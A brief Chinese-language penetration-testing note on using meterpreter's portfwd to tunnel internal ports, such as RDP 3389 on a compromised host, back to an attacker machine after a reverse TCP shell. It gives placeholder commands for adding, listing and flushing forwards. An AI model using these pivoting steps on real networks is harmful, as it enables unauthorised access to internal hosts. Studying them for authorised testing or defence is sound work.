1. 前置工作
通过反弹tcp拿到meterpreter。porfwd工具的使用在meterpreter中
2. 端口映射
portfwd add -L 攻击机ip -l 攻击机端口 -p 内网待渗透/开放端口 -r 内网待渗透ip
3. 端口转发,例如转发3389
portfwd add -l 攻击机端口 -p 3389 -r 肉鸡ip
然后再: rdesktop 127.0.0.1:攻击机端口。输入账号密码来进入远程界面。
4. 其他命令
portfwd list 查看目前的活跃端口
portfwd flush 清空列表